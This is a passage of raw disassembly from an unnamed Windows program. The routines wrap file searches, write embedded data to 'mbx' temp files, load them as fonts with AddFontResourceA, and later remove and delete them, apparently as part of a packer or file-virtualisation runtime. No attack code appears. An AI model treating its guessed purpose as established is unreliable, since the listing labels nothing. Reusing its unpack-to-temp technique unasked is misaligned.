mov eax, [ebp+var_5C]
jmp short loc_49062D
; ---------------------------------------------------------------------------
loc_4905EB: ; CODE XREF: sub_490252+15A�j
; sub_490252+1C8�j
cmp [ebp+arg_8], 0
jz short loc_49060C
mov eax, ds:dword_4A2908
mov eax, [eax+0Ch]
shl eax, 4
mov ecx, ds:dword_4A2908
mov ecx, [ecx+8]
add ecx, eax
mov eax, [ebp+arg_8]
mov [eax], ecx
loc_49060C: ; CODE XREF: sub_490252+39D�j
push 12h
call ds:dword_4A278C ; RtlRestoreLastWin32Error
loc_490614: ; CODE XREF: sub_490252+D1�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49061F
jmp short loc_49062B
sub_490252 endp
; =============== S U B R O U T I N E =======================================
sub_49061F proc near ; CODE XREF: sub_490252+3C6�p
; DATA XREF: _5:0049F2D8�o
push offset dword_4A28C8
call ds:dword_4A2754 ; RtlLeaveCriticalSection
retn
sub_49061F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_490252
loc_49062B: ; CODE XREF: sub_490252+3CB�j
xor eax, eax
loc_49062D: ; CODE XREF: sub_490252+51�j
; sub_490252+13A�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_490252
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49063E proc near ; CODE XREF: sub_49B334+E�p
; sub_49B361+7D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_8]
or dword ptr [eax], 0FFFFFFFFh
push 0Ch
call sub_49935A
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_49067B
mov eax, [ebp+var_8]
and dword ptr [eax], 0
mov eax, [ebp+var_8]
and dword ptr [eax+4], 0
mov eax, [ebp+var_8]
and dword ptr [eax+8], 0
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_49067F
; ---------------------------------------------------------------------------
loc_49067B: ; CODE XREF: sub_49063E+1F�j
and [ebp+var_C], 0
loc_49067F: ; CODE XREF: sub_49063E+3B�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and dword ptr [eax], 0
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_490252
test eax, eax
jz short loc_4906D8
push 0
push [ebp+arg_0]
call sub_49A2CA
pop ecx
pop ecx
mov ecx, [ebp+var_4]
mov [ecx+4], eax
mov eax, [ebp+var_4]
and dword ptr [eax+8], 0
push [ebp+var_4]
push [ebp+var_4]
mov ecx, ds:dword_4A28EC
call sub_48D000
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
mov [eax], ecx
and [ebp+var_4], 0
push 1
pop eax
jmp short locret_4906DA
; ---------------------------------------------------------------------------
loc_4906D8: ; CODE XREF: sub_49063E+5D�j
xor eax, eax
locret_4906DA: ; CODE XREF: sub_49063E+98�j
leave
retn 0Ch
sub_49063E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4906DE proc near ; CODE XREF: sub_49B626+12�p
; sub_49B657+19�p
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00490805 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F2F0
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 14h
push ebx
push esi
push edi
mov eax, ds:dword_4A28EC
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_490724
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_490728
; ---------------------------------------------------------------------------
loc_490724: ; CODE XREF: sub_4906DE+31�j
and [ebp+var_24], 0
loc_490728: ; CODE XREF: sub_4906DE+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_490805
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28EC
call sub_49C871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_4907DE
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_490778
push [ebp+var_1C]
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_490252
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_490778: ; CODE XREF: sub_4906DE+82�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jnz short loc_4907C5
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jnz short loc_4907B1
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call ds:dword_4A26D0 ; FindFirstFileA
mov ecx, [ebp+var_1C]
mov [ecx+8], eax
mov eax, [ebp+var_1C]
xor ecx, ecx
cmp dword ptr [eax+8], 0FFFFFFFFh
setnz cl
mov eax, [ebp+arg_8]
mov [eax], ecx
jmp short loc_4907C5
; ---------------------------------------------------------------------------
loc_4907B1: ; CODE XREF: sub_4906DE+A9�j
push [ebp+arg_4]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_4A26D4 ; FindNextFileA
mov ecx, [ebp+arg_8]
mov [ecx], eax
loc_4907C5: ; CODE XREF: sub_4906DE+A0�j
; sub_4906DE+D1�j
push 0FFFFFFFFh
mov [ebp+var_2C], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_490807
; ---------------------------------------------------------------------------
loc_4907DE: ; CODE XREF: sub_4906DE+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_4907E9
jmp short loc_490805
sub_4906DE endp
; =============== S U B R O U T I N E =======================================
sub_4907E9 proc near ; CODE XREF: sub_4906DE+104�p
mov eax, ds:dword_4A28EC
mov [ebp-28h], eax
cmp dword ptr [ebp-28h], 0
jz short locret_490804
mov eax, [ebp-28h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_490804: ; CODE XREF: sub_4907E9+C�j
retn
sub_4907E9 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4906DE
loc_490805: ; CODE XREF: sub_4906DE+50�j
; sub_4906DE+109�j
xor eax, eax
loc_490807: ; CODE XREF: sub_4906DE+FE�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_4906DE
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_490818 proc near ; CODE XREF: sub_491741+CE�p
; sub_49B5FF+B�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00490939 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F300
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
mov eax, ds:dword_4A28EC
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short loc_49085E
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_2C], 1
jmp short loc_490862
; ---------------------------------------------------------------------------
loc_49085E: ; CODE XREF: sub_490818+31�j
and [ebp+var_2C], 0
loc_490862: ; CODE XREF: sub_490818+44�j
movzx eax, [ebp+var_2C]
test eax, eax
jz loc_490939
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28EC
call sub_49C871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz loc_490912
mov eax, [ebp+var_1C]
cmp dword ptr [eax+8], 0
jz short loc_4908A2
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
call ds:dword_4A26A4 ; CloseHandle
loc_4908A2: ; CODE XREF: sub_490818+7C�j
push [ebp+arg_0]
mov ecx, ds:dword_4A28EC
call sub_49C8E0
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_4908EC
mov eax, [ebp+var_20]
mov eax, [eax+4]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_4993DD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_4908E4
push [ebp+var_20]
call sub_4993DD
pop ecx
loc_4908E4: ; CODE XREF: sub_490818+C1�j
mov eax, [ebp+var_20]
mov [ebp+var_38], eax
jmp short loc_4908F0
; ---------------------------------------------------------------------------
loc_4908EC: ; CODE XREF: sub_490818+A5�j
and [ebp+var_38], 0
loc_4908F0: ; CODE XREF: sub_490818+D2�j
mov eax, [ebp+arg_4]
mov dword ptr [eax], 1
push 0FFFFFFFFh
mov [ebp+var_3C], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_49093B
; ---------------------------------------------------------------------------
loc_490912: ; CODE XREF: sub_490818+6F�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49091D
jmp short loc_490939
sub_490818 endp
; =============== S U B R O U T I N E =======================================
sub_49091D proc near ; CODE XREF: sub_490818+FE�p
; DATA XREF: _5:0049F308�o
mov eax, ds:dword_4A28EC
mov [ebp-34h], eax
cmp dword ptr [ebp-34h], 0
jz short locret_490938
mov eax, [ebp-34h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_490938: ; CODE XREF: sub_49091D+C�j
retn
sub_49091D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_490818
loc_490939: ; CODE XREF: sub_490818+50�j
; sub_490818+103�j
xor eax, eax
loc_49093B: ; CODE XREF: sub_490818+F8�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_490818
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49094C proc near ; CODE XREF: sub_49C23E+20�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6C = dword ptr -6Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00490AAF SIZE 000001F8 BYTES
; FUNCTION CHUNK AT 00490D11 SIZE 00000013 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F310
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
or [ebp+var_28], 0FFFFFFFFh
and [ebp+var_2C], 0
and [ebp+var_1C], 0
and [ebp+var_24], 0
push 0
lea eax, [ebp+var_20]
push eax
push 3
push 80000000h
push [ebp+arg_0]
call sub_491346
test eax, eax
jz loc_490D11
cmp [ebp+var_20], 0FFFFFFFFh
jz loc_490D11
mov eax, ds:dword_4A28E4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4909D0
mov eax, [ebp+var_6C]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_70], 1
jmp short loc_4909D4
; ---------------------------------------------------------------------------
loc_4909D0: ; CODE XREF: sub_49094C+6F�j
and [ebp+var_70], 0
loc_4909D4: ; CODE XREF: sub_49094C+82�j
movzx eax, [ebp+var_70]
test eax, eax
jz loc_490D11
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_20]
mov ecx, ds:dword_4A28E4
call sub_49C871
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_34], eax
cmp [ebp+var_30], 0
jnz short loc_490A1E
push ds:off_49F4F8
push 22h
push ds:off_49F4FC
call sub_49948C
loc_490A1E: ; CODE XREF: sub_49094C+BD�j
mov eax, ds:dword_4A28E8
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_490A3F
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_490A43
; ---------------------------------------------------------------------------
loc_490A3F: ; CODE XREF: sub_49094C+DE�j
and [ebp+var_78], 0
loc_490A43: ; CODE XREF: sub_49094C+F1�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_490AAF
mov [ebp+var_4], 1
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_4A28E8
call sub_49C871
test eax, eax
jz short loc_490A88
push 0FFFFFFFFh
mov [ebp+var_84], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp loc_490D13
; ---------------------------------------------------------------------------
loc_490A88: ; CODE XREF: sub_49094C+118�j
and [ebp+var_4], 0
call sub_490A93
jmp short loc_490AAF
sub_49094C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_490A93 proc near ; CODE XREF: sub_49094C+140�p
; DATA XREF: _5:0049F324�o
mov eax, ds:dword_4A28E8
mov [ebp-7Ch], eax
cmp dword ptr [ebp-7Ch], 0
jz short locret_490AAE
mov eax, [ebp-7Ch]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_490AAE: ; CODE XREF: sub_490A93+C�j
retn
sub_490A93 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49094C
loc_490AAF: ; CODE XREF: sub_49094C+FD�j
; sub_49094C+145�j
push 104h
call sub_49935A
pop ecx
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
mov [ebp+var_2C], eax
push 104h
call sub_49935A
pop ecx
mov [ebp+var_54], eax
mov eax, [ebp+var_54]
mov [ebp+var_1C], eax
push [ebp+var_1C]
push 104h
call ds:dword_4A2734 ; GetTempPathA
push [ebp+var_2C]
push 0
push offset aMbx ; "mbx"
push [ebp+var_1C]
call ds:dword_4A2730 ; GetTempFileNameA
push 0
push 0
push 4
push 0
push 1
push 40000000h
push [ebp+var_2C]
call ds:dword_4A26A8 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_490B3B
push 0FFFFFFFFh
mov [ebp+var_88], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_88]
jmp loc_490D13
; ---------------------------------------------------------------------------
loc_490B3B: ; CODE XREF: sub_49094C+1CB�j
push 1000h
call sub_49935A
pop ecx
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
mov [ebp+var_24], eax
and [ebp+var_38], 0
loc_490B53: ; CODE XREF: sub_49094C+2BF�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_38]
cmp ecx, [eax+8]
jnb loc_490C10
mov eax, [ebp+var_34]
mov eax, [eax+8]
mov [ebp+var_48], eax
cmp [ebp+var_48], 1000h
jbe short loc_490B7B
mov [ebp+var_48], 1000h
loc_490B7B: ; CODE XREF: sub_49094C+226�j
lea eax, [ebp+var_40]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push [ebp+var_48]
push [ebp+var_24]
push [ebp+var_20]
call sub_492177
test eax, eax
jz short loc_490B9D
cmp [ebp+var_40], 0
jnz short loc_490BBF
loc_490B9D: ; CODE XREF: sub_49094C+249�j
push 0FFFFFFFFh
mov [ebp+var_8C], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_8C]
jmp loc_490D13
; ---------------------------------------------------------------------------
loc_490BBF: ; CODE XREF: sub_49094C+24F�j
push 0
lea eax, [ebp+var_44]
push eax
push [ebp+var_3C]
push [ebp+var_24]
push [ebp+var_28]
call ds:dword_4A27BC ; WriteFile
test eax, eax
jz short loc_490BE0
mov eax, [ebp+var_44]
cmp eax, [ebp+var_3C]
jz short loc_490C02
loc_490BE0: ; CODE XREF: sub_49094C+28A�j
push 0FFFFFFFFh
mov [ebp+var_90], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_90]
jmp loc_490D13
; ---------------------------------------------------------------------------
loc_490C02: ; CODE XREF: sub_49094C+292�j
mov eax, [ebp+var_38]
add eax, [ebp+var_3C]
mov [ebp+var_38], eax
jmp loc_490B53
; ---------------------------------------------------------------------------
loc_490C10: ; CODE XREF: sub_49094C+210�j
push [ebp+var_28]
call ds:dword_4A26A4 ; CloseHandle
or [ebp+var_28], 0FFFFFFFFh
push [ebp+var_2C]
call ds:dword_4A27DC ; AddFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_490C3C
push [ebp+var_2C]
call ds:dword_4A26C0 ; DeleteFileA
loc_490C3C: ; CODE XREF: sub_49094C+2E5�j
push 8
call sub_49935A
pop ecx
mov [ebp+var_5C], eax
cmp [ebp+var_5C], 0
jz short loc_490C67
mov eax, [ebp+var_5C]
and dword ptr [eax], 0
mov eax, [ebp+var_5C]
mov ecx, [ebp+var_2C]
mov [eax+4], ecx
mov eax, [ebp+var_5C]
mov [ebp+var_94], eax
jmp short loc_490C6E
; ---------------------------------------------------------------------------
loc_490C67: ; CODE XREF: sub_49094C+2FF�j
and [ebp+var_94], 0
loc_490C6E: ; CODE XREF: sub_49094C+319�j
push [ebp+var_94]
mov eax, [ebp+var_30]
push dword ptr [eax]
mov ecx, ds:dword_4A28E8
call sub_48D000
and [ebp+var_2C], 0
push 0FFFFFFFFh
mov [ebp+var_98], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_98]
jmp short loc_490D13
; END OF FUNCTION CHUNK FOR sub_49094C
; =============== S U B R O U T I N E =======================================
sub_490CA7 proc near ; DATA XREF: _5:0049F318�o
mov eax, ds:dword_4A28E4
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_490CC2
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
loc_490CC2: ; CODE XREF: sub_490CA7+C�j
cmp dword ptr [ebp-20h], 0FFFFFFFFh
jz short loc_490CD4
lea eax, [ebp-4Ch]
push eax
push dword ptr [ebp-20h]
call sub_491741
loc_490CD4: ; CODE XREF: sub_490CA7+1F�j
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_490CE3
push dword ptr [ebp-28h]
call ds:dword_4A26A4 ; CloseHandle
loc_490CE3: ; CODE XREF: sub_490CA7+31�j
mov eax, [ebp-2Ch]
mov [ebp-60h], eax
push dword ptr [ebp-60h]
call sub_4993DD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-64h], eax
push dword ptr [ebp-64h]
call sub_4993DD
pop ecx
mov eax, [ebp-24h]
mov [ebp-68h], eax
push dword ptr [ebp-68h]
call sub_4993DD
pop ecx
retn
sub_490CA7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49094C
loc_490D11: ; CODE XREF: sub_49094C+53�j
; sub_49094C+5D�j ...
xor eax, eax
loc_490D13: ; CODE XREF: sub_49094C+137�j
; sub_49094C+1EA�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_49094C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_490D24 proc near ; CODE XREF: sub_49C277+20�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F328
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 34h
push ebx
push esi
push edi
or [ebp+var_20], 0FFFFFFFFh
and [ebp+var_1C], 0
push 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_49253F
test eax, eax
jz loc_490EBA
movzx eax, [ebp+var_24]
test eax, eax
jnz loc_490EBA
mov eax, ds:dword_4A28E8
mov [ebp+var_34], eax
cmp [ebp+var_34], 0
jz short loc_490D98
mov eax, [ebp+var_34]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_38], 1
jmp short loc_490D9C
; ---------------------------------------------------------------------------
loc_490D98: ; CODE XREF: sub_490D24+5F�j
and [ebp+var_38], 0
loc_490D9C: ; CODE XREF: sub_490D24+72�j
movzx eax, [ebp+var_38]
test eax, eax
jz loc_490EBA
and [ebp+var_4], 0
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push [ebp+var_1C]
mov ecx, ds:dword_4A28E8
call sub_49C871
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz loc_490E88
mov eax, [ebp+var_28]
cmp dword ptr [eax], 0
jz short loc_490DE8
push ds:off_49F4F8
push 70h
push ds:off_49F4FC
call sub_49948C
loc_490DE8: ; CODE XREF: sub_490D24+AF�j
mov eax, [ebp+var_28]
cmp dword ptr [eax+4], 0
jnz short loc_490E04
push ds:off_49F4F8
push 71h
push ds:off_49F4FC
call sub_49948C
loc_490E04: ; CODE XREF: sub_490D24+CB�j
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_4A27EC ; RemoveFontResourceA
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov eax, [ebp+var_28]
push dword ptr [eax+4]
call ds:dword_4A26C0 ; DeleteFileA
push [ebp+var_1C]
mov ecx, ds:dword_4A28E8
call sub_49C8E0
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_490E6B
mov eax, [ebp+var_2C]
mov eax, [eax+4]
mov [ebp+var_3C], eax
push [ebp+var_3C]
call sub_4993DD
pop ecx
push 1
pop eax
and eax, 1
test eax, eax
jz short loc_490E63
push [ebp+var_2C]
call sub_4993DD
pop ecx
loc_490E63: ; CODE XREF: sub_490D24+134�j
mov eax, [ebp+var_2C]
mov [ebp+var_44], eax
jmp short loc_490E6F
; ---------------------------------------------------------------------------
loc_490E6B: ; CODE XREF: sub_490D24+118�j
and [ebp+var_44], 0
loc_490E6F: ; CODE XREF: sub_490D24+145�j
push 0FFFFFFFFh
mov [ebp+var_48], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_48]
jmp short loc_490EBC
; ---------------------------------------------------------------------------
loc_490E88: ; CODE XREF: sub_490D24+A3�j
push 0FFFFFFFFh
and [ebp+var_4C], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_4C]
jmp short loc_490EBC
; ---------------------------------------------------------------------------
loc_490E9E: ; DATA XREF: _5:0049F330�o
mov eax, ds:dword_4A28E8
mov [ebp+var_40], eax
cmp [ebp+var_40], 0
jz short locret_490EB9
mov eax, [ebp+var_40]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_490EB9: ; CODE XREF: sub_490D24+186�j
retn
; ---------------------------------------------------------------------------
loc_490EBA: ; CODE XREF: sub_490D24+41�j
; sub_490D24+4D�j ...
xor eax, eax
loc_490EBC: ; CODE XREF: sub_490D24+162�j
; sub_490D24+178�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_490D24 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_490ECD proc near ; CODE XREF: sub_49C55B+B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F338
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov eax, ds:dword_4A28E0
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_490F13
mov eax, [ebp+var_20]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_24], 1
jmp short loc_490F17
; ---------------------------------------------------------------------------
loc_490F13: ; CODE XREF: sub_490ECD+31�j
and [ebp+var_24], 0
loc_490F17: ; CODE XREF: sub_490ECD+44�j
movzx eax, [ebp+var_24]
test eax, eax
jz loc_490FAC
and [ebp+var_4], 0
push [ebp+arg_0]
mov ecx, ds:dword_4A28E0
call sub_49C871
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_490F54
push 0FFFFFFFFh
and [ebp+var_2C], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp short loc_490FAE
; ---------------------------------------------------------------------------
loc_490F54: ; CODE XREF: sub_490ECD+6F�j
push 8000h
push 0
push [ebp+arg_0]
call ds:dword_4A27A8 ; VirtualFree
mov ecx, [ebp+arg_4]
mov [ecx], eax
push [ebp+arg_0]
mov ecx, ds:dword_4A28E0
call sub_49C8E0
push 0FFFFFFFFh
mov [ebp+var_30], 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_490FAE
; ---------------------------------------------------------------------------
loc_490F90: ; DATA XREF: _5:0049F340�o
mov eax, ds:dword_4A28E0
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jz short locret_490FAB
mov eax, [ebp+var_28]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_490FAB: ; CODE XREF: sub_490ECD+CF�j
retn
; ---------------------------------------------------------------------------
loc_490FAC: ; CODE XREF: sub_490ECD+50�j
xor eax, eax
loc_490FAE: ; CODE XREF: sub_490ECD+85�j
; sub_490ECD+C1�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
sub_490ECD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_490FBF proc near ; CODE XREF: sub_49C51C+17�p
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F348
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 44h
push ebx
push esi
push edi
and [ebp+var_20], 0
mov eax, [ebp+arg_14]
and dword ptr [eax], 0
and [ebp+var_24], 0
mov [ebp+var_1C], 2
mov eax, ds:dword_4A28E4
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_49101A
mov eax, [ebp+var_48]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_4C], 1
jmp short loc_49101E
; ---------------------------------------------------------------------------
loc_49101A: ; CODE XREF: sub_490FBF+46�j
and [ebp+var_4C], 0
loc_49101E: ; CODE XREF: sub_490FBF+59�j
movzx eax, [ebp+var_4C]
test eax, eax
jz loc_491203
and [ebp+var_4], 0
